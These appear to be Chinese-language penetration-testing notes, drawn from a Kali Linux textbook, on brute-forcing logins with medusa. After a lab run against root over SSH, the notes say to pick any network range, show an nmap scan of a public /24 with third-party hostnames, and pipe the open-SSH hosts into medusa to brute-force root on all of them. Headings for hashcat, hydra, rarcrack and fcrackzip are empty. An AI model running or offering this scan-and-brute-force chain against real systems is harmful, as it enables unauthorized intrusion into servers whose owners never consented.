参考书 《kali linux渗透测试技术详解》 清华大学出版社 2015 杨波
一、medusa使用
原理:并行登陆破解
1、只输入单个命令,是查看帮助
root@kali:/tools/mima# medusa
我们看看medusa有哪些模块支持什么功能的破解
root@perl-exploit:/pentest/exploits/framework3# medusa -d
Available modules in "/usr/lib/medusa/modules" : + cvs.mod : Brute force module for CVS sessions : version 1.0.0 + ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0 + http.mod : Brute force module for HTTP : version 1.3.0 + imap.mod : Brute force module for IMAP sessions : version 1.2.0 + mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1 + mysql.mod : Brute force module for MySQL sessions : version 1.2 + ncp.mod : Brute force module for NCP sessions : version 1.0.0 + nntp.mod : Brute force module for NNTP sessions : version 1.0.0 + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2 + pop3.mod : Brute force module for POP3 sessions : version 1.2 + postgres.mod : Brute force module for PostgreSQL sessions : version 1.0.0 + rexec.mod : Brute force module for REXEC sessions : version 1.1.1 + rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2 + rsh.mod : Brute force module for RSH sessions : version 1.0.1 + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5 + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0 + smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0 + snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0 + ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2 + svn.mod : Brute force module for Subversion sessions : version 1.0.0 + telnet.mod : Brute force module for telnet sessions : version 1.2.2 + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1 + vnc.mod : Brute force module for VNC sessions : version 1.0.1 + web-form.mod : Brute force module for web forms : version 1.0.0 + wrapper.mod : Generic Wrapper Module : version 1.0.1
恩,我们要破解ssh,所以用-M ssh参数加载ssh模块,后面不用跟.mod
2、用口令文件破解单个IP,破解成功后会退出
root@kali:/tools/mima# medusa -h 192.168.80.131 -u root -P rkl.txt -M ssh
.... ACCOUNT CHECK: [ssh] Host: 192.168.80.131 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 12345 (28 of 2108 complete) ACCOUNT CHECK: [ssh] Host: 192.168.80.131 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (29 of 2108 complete) ACCOUNT FOUND: [ssh] Host: 192.168.80.131 User: root Password: 123456 [SUCCESS]
3、结合nmap、cut
首先我们确定目标,扫描开放ssh的机器,随便找个段扫描一下吧
root@perl-exploit:/pentest# nmap -sV -p22 -oG ssh 69.163.190.0/24
Host: 69.163.190.8 (ps10854.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/ Host: 69.163.190.9 (rangerjill.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
然后是漫长的等待,上面的参数扫描意思是,扫描整个段开了22端口的机器,并且判断服务版本,保存到ssh文件中。
类似这样的,这里我们要整理一下,把开了ssh的IP整理出来,现在明白oG保存的意义所在了
root@perl-exploit:/pentest# grep 22/open ssh | cut -d " " -f 2 >>ssh1.txt
root@perl-exploit:/pentest# medusa -H ssh1.txt -u root -P p.txt -M ssh
二、HASH暴力破解工具-Hashcat
http://www.sohu.com/a/248610818_609556
三、在线密码破解之hydra
四、rar密码破解之rarcrack
五、zip密码破解之fcrackzip